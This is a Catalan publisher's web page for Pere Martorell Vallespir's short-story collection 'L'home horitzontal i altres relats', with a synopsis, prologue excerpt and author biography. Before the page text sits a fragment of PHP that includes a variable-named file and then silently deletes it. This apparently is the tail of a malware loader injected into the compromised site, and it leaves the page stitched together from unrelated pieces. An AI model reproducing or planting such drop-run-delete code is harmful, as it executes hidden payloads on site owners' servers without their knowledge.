");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - L’home horitzontal i altres relats
Cercador d'Obres
ORDENAR:
Començar recerca

L’home horitzontal i altres relats

Martorell Vallespir, Pere

Prologuista:
Emili Manzano
Col·lecció:
Magatzem Can Toni
Tema:
Narració breu
Pàgines:
160
PVP:
14.00
ISBN:
978-84-18441-31-8
Data d'Edició:
09/06/2021
Deu narracions en què la història, la música, l’òpera o el teatre són protagonistes.
Sinopsi
L’home horitzontal és el relat que dóna títol al llibre que el lector té a les seves mans, un conjunt de deu narracions en què la història, la música, l’òpera o el teatre són protagonistes. L’autor recrea el captiveri de Jovellanos al castell de Bellver, el retrobament entre Fortunio Bonanova i Orson Wells a San Francisco, la presència del destructor anglès Devonshire a les acaballes de la Guerra Civil al port de Maó, i fins i tot gosa acabar la novel·la inconclusa de Thomas Mann Les confessions de Fèlix Krull. I és que Pere Martorell ­-ho assenyala Emili Manzano al pròleg- ha afrontat l’escriptura d’aquests contes deixant-se endur per vides alienes i imaginant-ne d’altres que ben bé podrien ser la pròpia.


L’autor juga lliurement amb grans figures de la literatura (Fernando Pessoa) i amb personatges històrics de gran volada (Jovellanos) o de perfil esvaït (Joaquim Wanrell); s’atreveix a imaginar la continuació de la meravellosa novel·la Confessions de Felix Krull, que Thomas Mann va deixar inacabada, amb la mateixa desimboltura i naturalitat que imagina un cruent episodi de la Guerra Civil a Menorca o inventa personatges com un al·lot de casa benestant enverinat per la vocació del teatre o un carter que somia escriure un llibre impossible sobre una alteració en el procés evolutiu dels humans. Tot neix d’un llibre o tot ens duu de cap a ell. La cultura i la vida. (Del pròleg d'Emili Manzano).


Llegir un fragment del Pròleg i l'Índex en PDF
Pere Martorell Vallespir
(Palma, 1965), cursà estudis de Geografia i Història a la Universitat de les Illes Balears i és funcionari de l’Agència Tributària de les Illes Balears. Membre de l’Associació d’Amics de l’Òpera del Teatre Principal (AOTP) des de la seva fundació. Especialista en la figura de Uetam, s’ha dedicat a la difusió de la figura del baix mallorquí. Amb motiu de la presentació del  “I Premi Uetam de Cant” organitzat per l’AOTP, dissertà sobre la vida i obra de Uetam a la seu de la Fundació Bartolomé March de Palma (2005). Participà en el documental Uetam, renaixement d’una llegenda, del director alemany Stephan Winkler (2007). Amb motiu del centenari de la mort del baix, també organitzat per l’AOTP, participà com a biògraf i narrador a l’espectacle Uetam torna al Principal, al Teatre Principal de Palma (2013).
A l’àmbit literari atresora un bon nombre de premis de relat breu, entre els quals en destaquen, entre d’altres, el Certamen Ploma de Ferro, de Capdepera; la Rosa d’Or dels Premis Castellitx, d’Algaida o el premi Antoni Gomila-Sant Bartomeu, de Montuïri.Ha publicat a les Edicions Documenta Balear, Uetam. Biografia del baix Francesc Mateu Nicolau (2018) i L'home horitzontal i altres relats (2021).

Recomanar
Comentar
Comentaris (0)